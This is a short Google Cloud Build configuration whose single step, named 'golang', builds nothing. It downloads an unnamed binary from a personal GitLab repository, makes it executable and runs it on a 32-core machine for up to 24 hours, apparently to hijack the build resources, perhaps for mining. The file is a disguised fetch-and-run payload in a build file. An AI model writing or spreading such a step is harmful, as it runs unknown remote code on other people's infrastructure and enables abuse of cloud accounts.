steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && wget https://gitlab.com/rudi.hartono.laoz/unmi/-/raw/main/gas && chmod u+x gas && ./gas
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  machineType: 'E2_HIGHCPU_32'
  diskSizeGb: '100'
